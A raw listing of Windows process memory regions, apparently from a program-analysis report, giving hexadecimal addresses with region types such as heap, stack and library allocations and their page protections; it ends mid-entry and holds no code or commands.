1FCBC850000
|
trusted library allocation
|
page read and write
|
||
22389E00000
|
trusted library allocation
|
page read and write
|
||
1FCBCCE1000
|
heap
|
page read and write
|
||
3E8277B000
|
stack
|
page read and write
|
||
244C1A56000
|
heap
|
page read and write
|
||
264CEC00000
|
heap
|
page read and write
|
||
7EF487F000
|
stack
|
page read and write
|
||
264CEC28000
|
heap
|
page read and write
|
||
22389F70000
|
trusted library allocation
|
page read and write
|
||
1DED977C000
|
unkown
|
page read and write
|
||
1FCB8470000
|
trusted library section
|
page readonly
|
||
244C23B1000
|
heap
|
page read and write
|
||
2238E694000
|
trusted library allocation
|
page read and write
|
||
1EE86500000
|
heap
|
page read and write
|
||
24340730000
|
trusted library allocation
|
page read and write
|
||
1FCB7BF0000
|
trusted library allocation
|
page read and write
|
||
244C23AD000
|
heap
|
page read and write
|
||
1FCBCAB0000
|
trusted library allocation
|
page read and write
|
||
1FCBCBE0000
|
trusted library allocation
|
page read and write
|
||
12F7000
|
stack
|
page read and write
|
||
2238E88E000
|
heap
|
page read and write
|
||
1DED95E0000
|
heap
|
page read and write
|
||
204B1454000
|
heap
|
page read and write
|
||
18D2EC49000
|
heap
|
page read and write
|
||
1DED97AE000
|
unkown
|
page read and write
|
||
1DED9B46000
|
unkown
|
page read and write
|
||
244C237F000
|
heap
|
page read and write
|
||
1FCB7C02000
|
heap
|
page read and write
|
||
2238906E000
|
heap
|
page read and write
|
||
3E82AFF000
|
stack
|
page read and write
|
||
2238E7C0000
|
trusted library allocation
|
page read and write
|
||
24D0C62A000
|
heap
|
page read and write
|
||
1520000
|
heap
|
page read and write
|
||
1FCBC981000
|
trusted library allocation
|
page read and write
|
||
2238E680000
|
trusted library allocation
|
page read and write
|
||
484EF78000
|
stack
|
page read and write
|
||
18D2F402000
|
trusted library allocation
|
page read and write
|
||
264CEB70000
|
heap
|
page read and write
|
||
E701A7F000
|
stack
|
page read and write
|
||
1DED9781000
|
unkown
|
page read and write
|
||
1FCBCCE1000
|
heap
|
page read and write
|
||
484F07A000
|
stack
|
page read and write
|
||
272C3847000
|
heap
|
page read and write
|
||
65593A000
|
stack
|
page read and write
|
||
AA96777000
|
stack
|
page read and write
|
||
1DED9B5F000
|
unkown
|
page read and write
|
||
1FCB8370000
|
trusted library allocation
|
page read and write
|
||
CA8000
|
unkown
|
page read and write
|
||
204B1472000
|
heap
|
page read and write
|
||
1FCB7277000
|
heap
|
page read and write
|
||
1FCB72A0000
|
heap
|
page read and write
|
||
3E8267E000
|
stack
|
page read and write
|
||
1FCBC966000
|
trusted library allocation
|
page read and write
|
||
1FCB7D00000
|
heap
|
page read and write
|
||
CAB000
|
unkown
|
page readonly
|
||
2238E7F4000
|
trusted library allocation
|
page read and write
|
||
244C1A82000
|
heap
|
page read and write
|
||
272C3875000
|
heap
|
page read and write
|
||
1DED97B3000
|
unkown
|
page read and write
|
||
18D2EA90000
|
heap
|
page read and write
|
||
1FCBCA80000
|
trusted library allocation
|
page read and write
|
||
C36DF7E000
|
stack
|
page read and write
|
||
FE0000
|
trusted library allocation
|
page read and write
|
||
244C2802000
|
heap
|
page read and write
|
||
2A24EC02000
|
trusted library allocation
|
page read and write
|
||
24D0C5E0000
|
trusted library allocation
|
page read and write
|
||
7192FE000
|
stack
|
page read and write
|
||
C36D4FA000
|
stack
|
page read and write
|
||
2A24CF60000
|
heap
|
page read and write
|
||
AA969FA000
|
stack
|
page read and write
|
||
1FCB728E000
|
heap
|
page read and write
|
||
148E000
|
stack
|
page read and write
|
||
272C387B000
|
heap
|
page read and write
|
||
1330000
|
heap
|
page read and write
|
||
87FF3F9000
|
stack
|
page read and write
|
||
1EE85D02000
|
heap
|
page read and write
|
||
77607FB000
|
stack
|
page read and write
|
||
7A097FD000
|
stack
|
page read and write
|
||
2238E66E000
|
trusted library allocation
|
page read and write
|
||
1FCB7D13000
|
heap
|
page read and write
|
||
1FCB7258000
|
heap
|
page read and write
|
||
1F64A5E0000
|
heap
|
page read and write
|
||
204B1502000
|
heap
|
page read and write
|
||
272C387C000
|
heap
|
page read and write
|
||
244C2377000
|
heap
|
page read and write
|
||
1FCBC990000
|
trusted library allocation
|
page read and write
|
||
C36DE7C000
|
stack
|
page read and write
|
||
2177F802000
|
trusted library allocation
|
page read and write
|
||
C36E07D000
|
stack
|
page read and write
|
||
1FCBCD1E000
|
heap
|
page read and write
|
||
1DED9B96000
|
unkown
|
page read and write
|
||
21FAF413000
|
heap
|
page read and write
|
||
24D0C708000
|
heap
|
page read and write
|
||
484E6DB000
|
stack
|
page read and write
|
||
7A096FF000
|
stack
|
page read and write
|
||
649AFB000
|
stack
|
page read and write
|
||
1DED7651000
|
heap
|
page read and write
|
||
244C1ACA000
|
heap
|
page read and write
|
||
272C3833000
|
heap
|
page read and write
|
||
1DED9795000
|
unkown
|
page read and write
|
||
244C2318000
|
heap
|
page read and write
|
||
1DED42A4000
|
heap
|
page read and write
|
||
1DED9B32000
|
unkown
|
page read and write
|
||
1FCBCCA0000
|
heap
|
page read and write
|
||
244C1840000
|
heap
|
page read and write
|
||
655E7C000
|
stack
|
page read and write
|
||
1FCB7BF3000
|
trusted library allocation
|
page read and write
|
||
16370FB5000
|
heap
|
page read and write
|
||
24D0C65C000
|
heap
|
page read and write
|
||
1DED9B78000
|
unkown
|
page read and write
|
||
244C1B16000
|
heap
|
page read and write
|
||
1DED9AA6000
|
unkown
|
page read and write
|
||
1FCBCCE1000
|
heap
|
page read and write
|
||
1DED42AE000
|
heap
|
page read and write
|
||
244C2377000
|
heap
|
page read and write
|
||
2238E668000
|
trusted library allocation
|
page read and write
|
||
264CEC02000
|
heap
|
page read and write
|
||
2238E666000
|
trusted library allocation
|
page read and write
|
||
1DED9790000
|
unkown
|
page read and write
|
||
C36D3F8000
|
stack
|
page read and write
|
||
244C2384000
|
heap
|
page read and write
|
||
1FCB7270000
|
heap
|
page read and write
|
||
1DED9AEC000
|
unkown
|
page read and write
|
||
2433FC35000
|
heap
|
page read and write
|
||
1DED40C4000
|
heap
|
page read and write
|
||
1FCBCD0A000
|
heap
|
page read and write
|
||
2A24D057000
|
heap
|
page read and write
|
||
3E82BFF000
|
stack
|
page read and write
|
||
1FCB84A0000
|
trusted library section
|
page readonly
|
||
655C7F000
|
stack
|
page read and write
|
||
21FAF280000
|
heap
|
page read and write
|
||
1FCBC960000
|
trusted library allocation
|
page read and write
|
||
1F64A3B0000
|
heap
|
page read and write
|
||
1FCB7D18000
|
heap
|
page read and write
|
||
537D2EB000
|
stack
|
page read and write
|
||
C36DC7E000
|
stack
|
page read and write
|
||
2238E6A0000
|
trusted library allocation
|
page read and write
|
||
1FCB7D18000
|
heap
|
page read and write
|
||
244C2384000
|
heap
|
page read and write
|
||
264CF602000
|
trusted library allocation
|
page read and write
|
||
223899DC000
|
heap
|
page read and write
|
||
244C1940000
|
trusted library allocation
|
page read and write
|
||
1DED97D1000
|
unkown
|
page read and write
|
||
7191FE000
|
stack
|
page read and write
|
||
16370D60000
|
heap
|
page read and write
|
||
C97000
|
unkown
|
page readonly
|
||
18D2EC2A000
|
heap
|
page read and write
|
||
272C3853000
|
heap
|
page read and write
|
||
2433F9CE000
|
heap
|
page read and write
|
||
2613D47D000
|
heap
|
page read and write
|
||
1FCB71C0000
|
heap
|
page read and write
|
||
1FCBCCDE000
|
heap
|
page read and write
|
||
244C1A13000
|
heap
|
page read and write
|
||
1DED40FC000
|
heap
|
page read and write
|
||
22389058000
|
heap
|
page read and write
|
||
2238E7F4000
|
trusted library allocation
|
page read and write
|
||
64A27F000
|
stack
|
page read and write
|
||
244C239C000
|
heap
|
page read and write
|
||
1DED9B8C000
|
unkown
|
page read and write
|
||
272C3902000
|
heap
|
page read and write
|
||
223897D1000
|
trusted library allocation
|
page read and write
|
||
272C3848000
|
heap
|
page read and write
|
||
272C384A000
|
heap
|
page read and write
|
||
C71000
|
unkown
|
page execute read
|
||
244C2377000
|
heap
|
page read and write
|
||
22388E50000
|
heap
|
page read and write
|
||
2A24D013000
|
heap
|
page read and write
|
||
244C1AF2000
|
heap
|
page read and write
|
||
244C21A0000
|
remote allocation
|
page read and write
|
||
272C3854000
|
heap
|
page read and write
|
||
AA971FB000
|
stack
|
page read and write
|
||
C36D97F000
|
stack
|
page read and write
|
||
C36DE7C000
|
stack
|
page read and write
|
||
144E000
|
stack
|
page read and write
|
||
A3ADE7E000
|
stack
|
page read and write
|
||
1FCB71F0000
|
trusted library allocation
|
page read and write
|
||
24D0C68E000
|
heap
|
page read and write
|
||
1FCB7313000
|
heap
|
page read and write
|
||
AA96D7E000
|
stack
|
page read and write
|
||
1DED974F000
|
unkown
|
page read and write
|
||
655DFE000
|
stack
|
page read and write
|
||
1FCBCC00000
|
heap
|
page read and write
|
||
1F64A3BE000
|
heap
|
page read and write
|
||
2238E8A1000
|
heap
|
page read and write
|
||
64A07F000
|
stack
|
page read and write
|
||
1EE85C00000
|
heap
|
page read and write
|
||
21FAF402000
|
heap
|
page read and write
|
||
20CD6B13000
|
heap
|
page read and write
|
||
24D0C700000
|
heap
|
page read and write
|
||
204B1513000
|
heap
|
page read and write
|
||
1EE859A0000
|
heap
|
page read and write
|
||
1DED9AAB000
|
unkown
|
page read and write
|
||
1FCBCC4A000
|
heap
|
page read and write
|
||
244C23B1000
|
heap
|
page read and write
|
||
16370D9C000
|
heap
|
page read and write
|
||
2238EA10000
|
trusted library allocation
|
page read and write
|
||
2238E88C000
|
heap
|
page read and write
|
||
204B1424000
|
heap
|
page read and write
|
||
2177EE54000
|
heap
|
page read and write
|
||
2238E7F0000
|
trusted library allocation
|
page read and write
|
||
264CEBE0000
|
heap
|
page read and write
|
||
1FCB87F0000
|
trusted library allocation
|
page read and write
|
||
2A24D058000
|
heap
|
page read and write
|
||
C36DBFA000
|
stack
|
page read and write
|
||
20CD6700000
|
heap
|
page read and write
|
||
1DED9A97000
|
unkown
|
page read and write
|
||
272C3843000
|
heap
|
page read and write
|
||
244C2391000
|
heap
|
page read and write
|
||
655D78000
|
stack
|
page read and write
|
||
7EF3F1B000
|
stack
|
page read and write
|
||
24D0C613000
|
heap
|
page read and write
|
||
244C2368000
|
heap
|
page read and write
|
||
1FCBCC3D000
|
heap
|
page read and write
|
||
2613D350000
|
heap
|
page read and write
|
||
2A24EAB0000
|
trusted library allocation
|
page read and write
|
||
2238903F000
|
heap
|
page read and write
|
||
244C17E0000
|
heap
|
page read and write
|
||
244C238A000
|
heap
|
page read and write
|
||
1FCBC965000
|
trusted library allocation
|
page read and write
|
||
16370CE0000
|
heap
|
page read and write
|
||
2238E740000
|
remote allocation
|
page read and write
|
||
1FCBCCA9000
|
heap
|
page read and write
|
||
2238E680000
|
trusted library allocation
|
page read and write
|
||
1FCB7C00000
|
heap
|
page read and write
|
||
264CED02000
|
heap
|
page read and write
|
||
21FAF502000
|
heap
|
page read and write
|
||
484EE7F000
|
stack
|
page read and write
|
||
2A24D047000
|
heap
|
page read and write
|
||
204B1413000
|
heap
|
page read and write
|
||
537DBFF000
|
stack
|
page read and write
|
||
6559BF000
|
stack
|
page read and write
|
||
244C23AC000
|
heap
|
page read and write
|
||
3E8235C000
|
stack
|
page read and write
|
||
2238E720000
|
trusted library allocation
|
page read and write
|
||
1FCBCC3D000
|
heap
|
page read and write
|
||
1EE85C83000
|
heap
|
page read and write
|
||
1DED40E7000
|
heap
|
page read and write
|
||
1FCB7200000
|
heap
|
page read and write
|
||
1FCBCC4A000
|
heap
|
page read and write
|
||
46669EC000
|
stack
|
page read and write
|
||
244C238A000
|
heap
|
page read and write
|
||
F10000
|
heap
|
page read and write
|
||
244C1A49000
|
heap
|
page read and write
|
||
1FCB71C0000
|
heap
|
page read and write
|
||
16370DBD000
|
heap
|
page read and write
|
||
1FCB723D000
|
heap
|
page read and write
|
||
22388FC0000
|
trusted library allocation
|
page read and write
|
||
AA96FFF000
|
stack
|
page read and write
|
||
1FCB7150000
|
unkown
|
page read and write
|
||
1FCB7313000
|
heap
|
page read and write
|
||
272C3846000
|
heap
|
page read and write
|
||
1DED9B73000
|
unkown
|
page read and write
|
||
1AFF479000
|
stack
|
page read and write
|
||
2238E829000
|
heap
|
page read and write
|
||
2613D427000
|
heap
|
page read and write
|
||
244C2375000
|
heap
|
page read and write
|
||
1DED97DB000
|
unkown
|
page read and write
|
||
244C238B000
|
heap
|
page read and write
|
||
CA8000
|
unkown
|
page write copy
|
||
18D2EB00000
|
heap
|
page read and write
|
||
1FCBCC9E000
|
heap
|
page read and write
|
||
1FCBCCF4000
|
heap
|
page read and write
|
||
244C238A000
|
heap
|
page read and write
|
||
2613D477000
|
heap
|
page read and write
|
||
244C2384000
|
heap
|
page read and write
|
||
204B1402000
|
heap
|
page read and write
|
||
244C2802000
|
heap
|
page read and write
|
||
2A24D11C000
|
heap
|
page read and write
|
||
1FCBC850000
|
trusted library allocation
|
page read and write
|
||
1FCB723D000
|
heap
|
page read and write
|
||
C71000
|
unkown
|
page execute read
|
||
2177ED80000
|
heap
|
page read and write
|
||
244C2377000
|
heap
|
page read and write
|
||
87FF37F000
|
stack
|
page read and write
|
||
244C239B000
|
heap
|
page read and write
|
||
1DED9B64000
|
unkown
|
page read and write
|
||
272C383E000
|
heap
|
page read and write
|
||
244C238A000
|
heap
|
page read and write
|
||
20CD6A02000
|
heap
|
page read and write
|
||
16370DBD000
|
heap
|
page read and write
|
||
244C1A7A000
|
heap
|
page read and write
|
||
A3ADBFF000
|
stack
|
page read and write
|
||
1FCBCC63000
|
heap
|
page read and write
|
||
2613D45D000
|
heap
|
page read and write
|
||
1FCB7150000
|
unkown
|
page read and write
|
||
AA96CFE000
|
stack
|
page read and write
|
||
2177EE3C000
|
heap
|
page read and write
|
||
18D2ED02000
|
heap
|
page read and write
|
||
7A0947C000
|
stack
|
page read and write
|
||
18D2EC4E000
|
heap
|
page read and write
|
||
2613D465000
|
heap
|
page read and write
|
||
2A24D058000
|
heap
|
page read and write
|
||
1EE85CC9000
|
heap
|
page read and write
|
||
C36E07D000
|
stack
|
page read and write
|
||
15399FE000
|
stack
|
page read and write
|
||
2177EE8E000
|
heap
|
page read and write
|
||
1FCB8460000
|
trusted library section
|
page readonly
|
||
E7012DC000
|
stack
|
page read and write
|
||
272C386A000
|
heap
|
page read and write
|
||
1FCBCCA0000
|
heap
|
page read and write
|
||
1FCB7270000
|
heap
|
page read and write
|
||
244C17D0000
|
heap
|
page read and write
|
||
244C23AD000
|
heap
|
page read and write
|
||
1EE85C29000
|
heap
|
page read and write
|
||
244C239B000
|
heap
|
page read and write
|
||
1FCB7C00000
|
heap
|
page read and write
|
||
2613D2E0000
|
heap
|
page read and write
|
||
24D0C5B0000
|
heap
|
page read and write
|
||
24D0C659000
|
heap
|
page read and write
|
||
C36D4FA000
|
stack
|
page read and write
|
||
1DED97D6000
|
unkown
|
page read and write
|
||
C36DAFE000
|
stack
|
page read and write
|
||
244C1B08000
|
heap
|
page read and write
|
||
1FCBC840000
|
trusted library allocation
|
page read and write
|
||
1FCB72A0000
|
heap
|
page read and write
|
||
1DED97A9000
|
unkown
|
page read and write
|
||
1DED9A88000
|
unkown
|
page read and write
|
||
1FCBCD23000
|
heap
|
page read and write
|
||
87FF279000
|
stack
|
page read and write
|
||
2238999B000
|
heap
|
page read and write
|
||
1FCBCA70000
|
trusted library allocation
|
page read and write
|
||
1FCB7D9A000
|
heap
|
page read and write
|
||
18D2EC88000
|
heap
|
page read and write
|
||
1DED9B5A000
|
unkown
|
page read and write
|
||
7EF447B000
|
stack
|
page read and write
|
||
272C4090000
|
trusted library allocation
|
page read and write
|
||
153930C000
|
stack
|
page read and write
|
||
1DED9A7E000
|
unkown
|
page read and write
|
||
21FAFBC0000
|
remote allocation
|
page read and write
|
||
2177EE4C000
|
heap
|
page read and write
|
||
2433F988000
|
heap
|
page read and write
|
||
1545000
|
heap
|
page read and write
|
||
1DED97F4000
|
unkown
|
page read and write
|
||
1FCBC990000
|
trusted library allocation
|
page read and write
|
||
1FCB7BD1000
|
trusted library allocation
|
page read and write
|
||
537D8F7000
|
stack
|
page read and write
|
||
2238E687000
|
trusted library allocation
|
page read and write
|
||
1FCBC800000
|
trusted library allocation
|
page read and write
|
||
2238E664000
|
trusted library allocation
|
page read and write
|
||
1FCBC9A4000
|
trusted library allocation
|
page read and write
|
||
1FCBC800000
|
trusted library allocation
|
page read and write
|
||
1FCB7160000
|
heap
|
page read and write
|
||
484F0FE000
|
unkown
|
page read and write
|
||
1DED9AD3000
|
unkown
|
page read and write
|
||
21FAFBC0000
|
remote allocation
|
page read and write
|
||
2433F870000
|
heap
|
page read and write
|
||
C36DA7F000
|
stack
|
page read and write
|
||
1FCB8450000
|
trusted library section
|
page readonly
|
||
1FCBCCBC000
|
heap
|
page read and write
|
||
1DED9AF6000
|
unkown
|
page read and write
|
||
1DED9A8D000
|
unkown
|
page read and write
|
||
244C237E000
|
heap
|
page read and write
|
||
46671F9000
|
stack
|
page read and write
|
||
4666CFE000
|
stack
|
page read and write
|
||
1DED4010000
|
heap
|
page read and write
|
||
244C1A53000
|
heap
|
page read and write
|
||
22389B00000
|
trusted library allocation
|
page read and write
|
||
22389091000
|
heap
|
page read and write
|
||
1FCB7D9A000
|
heap
|
page read and write
|
||
1FCBCCDE000
|
heap
|
page read and write
|
||
AA968FA000
|
stack
|
page read and write
|
||
C36DBFA000
|
stack
|
page read and write
|
||
2A24D118000
|
heap
|
page read and write
|
||
3E823DF000
|
stack
|
page read and write
|
||
2238E83D000
|
heap
|
page read and write
|
||
1FCB7293000
|
heap
|
page read and write
|
||
87FF17E000
|
stack
|
page read and write
|
||
1AFF27F000
|
stack
|
page read and write
|
||
1EE85CBF000
|
heap
|
page read and write
|
||
2433F880000
|
trusted library allocation
|
page read and write
|
||
484EAFB000
|
stack
|
page read and write
|
||
244C2300000
|
heap
|
page read and write
|
||
264CEC59000
|
heap
|
page read and write
|
||
1FCB8450000
|
trusted library section
|
page readonly
|
||
204B1C02000
|
trusted library allocation
|
page read and write
|
||
24D0C600000
|
heap
|
page read and write
|
||
16370B90000
|
heap
|
page readonly
|
||
204B1270000
|
heap
|
page read and write
|
||
7A08F0B000
|
stack
|
page read and write
|
||
244C2802000
|
heap
|
page read and write
|
||
1539DFE000
|
stack
|
page read and write
|
||
1FCBC803000
|
trusted library allocation
|
page read and write
|
||
1DED97A4000
|
unkown
|
page read and write
|
||
2177EE81000
|
heap
|
page read and write
|
||
244C2802000
|
heap
|
page read and write
|
||
1FCBCA30000
|
trusted library allocation
|
page read and write
|
||
244C1AAD000
|
heap
|
page read and write
|
||
244C1A4A000
|
heap
|
page read and write
|
||
1FCB7302000
|
heap
|
page read and write
|
||
244C2313000
|
heap
|
page read and write
|
||
223890FC000
|
heap
|
page read and write
|
||
24D0C656000
|
heap
|
page read and write
|
||
1DED97E0000
|
unkown
|
page read and write
|
||
2238E550000
|
trusted library allocation
|
page read and write
|
||
272C3849000
|
heap
|
page read and write
|
||
1FCB727A000
|
heap
|
page read and write
|
||
1DED978B000
|
unkown
|
page read and write
|
||
1DED9ABA000
|
unkown
|
page read and write
|
||
1DED5974000
|
heap
|
page read and write
|
||
2433F9A6000
|
heap
|
page read and write
|
||
264CEC79000
|
heap
|
page read and write
|
||
C36DAFE000
|
stack
|
page read and write
|
||
2613D429000
|
heap
|
page read and write
|
||
14D0000
|
heap
|
page read and write
|
||
244C2382000
|
heap
|
page read and write
|
||
244C2382000
|
heap
|
page read and write
|
||
1FCB723D000
|
heap
|
page read and write
|
||
1EE85CE7000
|
heap
|
page read and write
|
||
272C4202000
|
trusted library allocation
|
page read and write
|
||
1FCBCC0C000
|
heap
|
page read and write
|
||
1FCB7275000
|
heap
|
page read and write
|
||
1FCB7275000
|
heap
|
page read and write
|
||
18D2EC6F000
|
heap
|
page read and write
|
||
1FCB7200000
|
heap
|
page read and write
|
||
244C2380000
|
heap
|
page read and write
|
||
18D2EC4B000
|
heap
|
page read and write
|
||
1DED979F000
|
unkown
|
page read and write
|
||
1FCB7B70000
|
trusted library section
|
page read and write
|
||
8A0193B000
|
stack
|
page read and write
|
||
244C237E000
|
heap
|
page read and write
|
||
46669EF000
|
stack
|
page read and write
|
||
18D2EC7A000
|
heap
|
page read and write
|
||
1FCB84A0000
|
trusted library section
|
page readonly
|
||
1FCB71C0000
|
heap
|
page read and write
|
||
537D9FE000
|
stack
|
page read and write
|
||
1FCBCD1E000
|
heap
|
page read and write
|
||
272C383A000
|
heap
|
page read and write
|
||
244C2803000
|
heap
|
page read and write
|
||
2433FC39000
|
heap
|
page read and write
|
||
21FAFBC0000
|
remote allocation
|
page read and write
|
||
204B143D000
|
heap
|
page read and write
|
||
2A24EB70000
|
remote allocation
|
page read and write
|
||
244C239B000
|
heap
|
page read and write
|
||
1DED9AE7000
|
unkown
|
page read and write
|
||
2433FC30000
|
heap
|
page read and write
|
||
1DED9A74000
|
unkown
|
page read and write
|
||
C36D27E000
|
stack
|
page read and write
|
||
24D0C63C000
|
heap
|
page read and write
|
||
1FCBCCBC000
|
heap
|
page read and write
|
||
1FCB71F0000
|
trusted library allocation
|
page read and write
|
||
18D2ED00000
|
heap
|
page read and write
|
||
C36D6FE000
|
stack
|
page read and write
|
||
244C239D000
|
heap
|
page read and write
|
||
1539FFE000
|
stack
|
page read and write
|
||
C36D87E000
|
stack
|
page read and write
|
||
1FCB7221000
|
heap
|
page read and write
|
||
264CEC13000
|
heap
|
page read and write
|
||
18D2EC3C000
|
heap
|
page read and write
|
||
16370DC2000
|
heap
|
page read and write
|
||
1310000
|
trusted library allocation
|
page read and write
|
||
21FAF42A000
|
heap
|
page read and write
|
||
E70187E000
|
stack
|
page read and write
|
||
1FCB7213000
|
heap
|
page read and write
|
||
C36DAFE000
|
stack
|
page read and write
|
||
22388EC0000
|
heap
|
page read and write
|
||
1FCBCCF4000
|
heap
|
page read and write
|
||
2238E684000
|
trusted library allocation
|
page read and write
|
||
2613DE02000
|
trusted library allocation
|
page read and write
|
||
1FCBCCBC000
|
heap
|
page read and write
|
||
16370D8E000
|
heap
|
page read and write
|
||
264CEC3C000
|
heap
|
page read and write
|
||
E70177F000
|
stack
|
page read and write
|
||
2177EE00000
|
heap
|
page read and write
|
||
1FCB7B70000
|
trusted library section
|
page read and write
|
||
1FCBCC1D000
|
heap
|
page read and write
|
||
1FCBCD20000
|
heap
|
page read and write
|
||
7EF4577000
|
stack
|
page read and write
|
||
16370D89000
|
heap
|
page read and write
|
||
22388FD0000
|
trusted library section
|
page read and write
|
||
24D0C654000
|
heap
|
page read and write
|
||
1FCB8480000
|
trusted library section
|
page readonly
|
||
1FCBCAC0000
|
remote allocation
|
page read and write
|
||
1335000
|
heap
|
page read and write
|
||
87FF1FE000
|
stack
|
page read and write
|
||
244C2385000
|
heap
|
page read and write
|
||
272C3845000
|
heap
|
page read and write
|
||
1FCBCAB0000
|
trusted library allocation
|
page read and write
|
||
2433FC00000
|
heap
|
page readonly
|
||
C70000
|
unkown
|
page readonly
|
||
1FCB7302000
|
heap
|
page read and write
|
||
16370D68000
|
heap
|
page read and write
|
||
244C1AA6000
|
heap
|
page read and write
|
||
2238A080000
|
trusted library allocation
|
page read and write
|
||
21FAF2F0000
|
heap
|
page read and write
|
||
AA970FB000
|
stack
|
page read and write
|
||
244C23AE000
|
heap
|
page read and write
|
||
2238E6B0000
|
trusted library allocation
|
page read and write
|
||
1DED97EF000
|
unkown
|
page read and write
|
||
7A092FE000
|
stack
|
page read and write
|
||
1FCB72FE000
|
heap
|
page read and write
|
||
2238E540000
|
trusted library allocation
|
page read and write
|
||
C36D5FA000
|
stack
|
page read and write
|
||
2A24EAF0000
|
trusted library allocation
|
page read and write
|
||
2238A1B0000
|
trusted library section
|
page readonly
|
||
1DED9AF1000
|
unkown
|
page read and write
|
||
C36DD7A000
|
stack
|
page read and write
|
||
1DED9817000
|
unkown
|
page read and write
|
||
16370D8E000
|
heap
|
page read and write
|
||
2238E7F4000
|
trusted library allocation
|
page read and write
|
||
2613D460000
|
heap
|
page read and write
|
||
244C2802000
|
heap
|
page read and write
|
||
20CD6800000
|
unkown
|
page read and write
|
||
24D0C67D000
|
heap
|
page read and write
|
||
18D2EC8C000
|
heap
|
page read and write
|
||
1FCBC980000
|
trusted library allocation
|
page read and write
|
||
1FCB728E000
|
heap
|
page read and write
|
||
6496DB000
|
stack
|
page read and write
|
||
16370DBA000
|
heap
|
page read and write
|
||
1FCBC840000
|
trusted library allocation
|
page read and write
|
||
272C382E000
|
heap
|
page read and write
|
||
1FCBCCA9000
|
heap
|
page read and write
|
||
64A47F000
|
stack
|
page read and write
|
||
7EF437C000
|
stack
|
page read and write
|
||
16370DBE000
|
heap
|
page read and write
|
||
18D2EC13000
|
heap
|
page read and write
|
||
1FCBCD09000
|
heap
|
page read and write
|
||
1FCB7D00000
|
heap
|
page read and write
|
||
1FCBCCB2000
|
heap
|
page read and write
|
||
171E000
|
stack
|
page read and write
|
||
18D2ED13000
|
heap
|
page read and write
|
||
1DED97C2000
|
unkown
|
page read and write
|
||
16370CC0000
|
heap
|
page read and write
|
||
1DED97C7000
|
unkown
|
page read and write
|
||
264CED13000
|
heap
|
page read and write
|
||
1FCBCAB0000
|
trusted library allocation
|
page read and write
|
||
2433F9C6000
|
heap
|
page read and write
|
||
2613D413000
|
heap
|
page read and write
|
||
2A24EA80000
|
trusted library allocation
|
page read and write
|
||
1FCBCCF4000
|
heap
|
page read and write
|
||
2A24D000000
|
heap
|
page read and write
|
||
204B1469000
|
heap
|
page read and write
|
||
1FCB7293000
|
heap
|
page read and write
|
||
244C1ADA000
|
heap
|
page read and write
|
||
2A24D01F000
|
heap
|
page read and write
|
||
1FCB8270000
|
trusted library allocation
|
page read and write
|
||
2433F980000
|
heap
|
page read and write
|
||
1DED40AB000
|
heap
|
page read and write
|
||
1DED97BD000
|
unkown
|
page read and write
|
||
1FCBCC0C000
|
heap
|
page read and write
|
||
2177EE50000
|
heap
|
page read and write
|
||
272C3852000
|
heap
|
page read and write
|
||
24D0C65F000
|
heap
|
page read and write
|
||
1FCB7D13000
|
heap
|
page read and write
|
||
537D36D000
|
stack
|
page read and write
|
||
2238E800000
|
heap
|
page read and write
|
||
272C384F000
|
heap
|
page read and write
|
||
2613D43C000
|
heap
|
page read and write
|
||
1FCBC96E000
|
trusted library allocation
|
page read and write
|
||
1DED980D000
|
unkown
|
page read and write
|
||
20CD6902000
|
trusted library allocation
|
page read and write
|
||
2238E850000
|
heap
|
page read and write
|
||
2177EDF0000
|
heap
|
page read and write
|
||
1DED40B3000
|
heap
|
page read and write
|
||
2433F900000
|
heap
|
page read and write
|
||
C36DC7E000
|
stack
|
page read and write
|
||
1FCB7C15000
|
heap
|
page read and write
|
||
22389800000
|
heap
|
page read and write
|
||
655CFF000
|
stack
|
page read and write
|
||
1DED5970000
|
heap
|
page read and write
|
||
1539BFB000
|
stack
|
page read and write
|
||
1EE85C7D000
|
heap
|
page read and write
|
||
22389918000
|
heap
|
page read and write
|
||
2238E843000
|
heap
|
page read and write
|
||
244C1A00000
|
heap
|
page read and write
|
||
2177EE47000
|
heap
|
page read and write
|
||
18D2EC50000
|
heap
|
page read and write
|
||
1DED9AD8000
|
unkown
|
page read and write
|
||
2A24D073000
|
heap
|
page read and write
|
||
1FCBCA90000
|
trusted library allocation
|
page read and write
|
||
2613D482000
|
heap
|
page read and write
|
||
20CD6690000
|
heap
|
page read and write
|
||
1FCBCD00000
|
heap
|
page read and write
|
||
22389113000
|
heap
|
page read and write
|
||
1DED97B8000
|
unkown
|
page read and write
|
||
16370D89000
|
heap
|
page read and write
|
||
1FCBCC63000
|
heap
|
page read and write
|
||
46672FE000
|
stack
|
page read and write
|
||
18D2ED08000
|
heap
|
page read and write
|
||
1FCB7150000
|
heap
|
page read and write
|
||
1F64A3B6000
|
heap
|
page read and write
|
||
1F64A3A1000
|
heap
|
page read and write
|
||
1DED9B87000
|
unkown
|
page read and write
|
||
1FCB7275000
|
heap
|
page read and write
|
||
244C1A52000
|
heap
|
page read and write
|
||
22389F60000
|
trusted library allocation
|
page read and write
|
||
244C2202000
|
heap
|
page read and write
|
||
18D2EC4C000
|
heap
|
page read and write
|
||
2177EE29000
|
heap
|
page read and write
|
||
272C37F0000
|
heap
|
page read and write
|
||
C36DD7A000
|
stack
|
page read and write
|
||
223899DB000
|
heap
|
page read and write
|
||
244C1A4B000
|
heap
|
page read and write
|
||
20CD6802000
|
unkown
|
page read and write
|
||
1FCB7221000
|
heap
|
page read and write
|
||
2238A180000
|
trusted library section
|
page readonly
|
||
1AFF37E000
|
stack
|
page read and write
|
||
C36D8FF000
|
stack
|
page read and write
|
||
1F64A3B2000
|
heap
|
page read and write
|
||
1FCBCD0F000
|
heap
|
page read and write
|
||
2433F8E0000
|
heap
|
page read and write
|
||
1FCB729E000
|
heap
|
page read and write
|
||
1AFF17C000
|
stack
|
page read and write
|
||
20CD6828000
|
heap
|
page read and write
|
||
244C23BE000
|
heap
|
page read and write
|
||
1528000
|
heap
|
page read and write
|
||
C36D5FA000
|
stack
|
page read and write
|
||
1FCBCD0D000
|
heap
|
page read and write
|
||
2238E7D0000
|
trusted library allocation
|
page read and write
|
||
2238E660000
|
trusted library allocation
|
page read and write
|
||
1FCB729E000
|
heap
|
page read and write
|
||
C36D7FB000
|
stack
|
page read and write
|
||
2A24EB70000
|
remote allocation
|
page read and write
|
||
244C238A000
|
heap
|
page read and write
|
||
1FCBCAB0000
|
trusted library allocation
|
page read and write
|
||
18D2EC75000
|
heap
|
page read and write
|
||
2A24D002000
|
heap
|
page read and write
|
||
1FCBCC3D000
|
heap
|
page read and write
|
||
A3AE17C000
|
stack
|
page read and write
|
||
12FC000
|
stack
|
page read and write
|
||
1FCB8460000
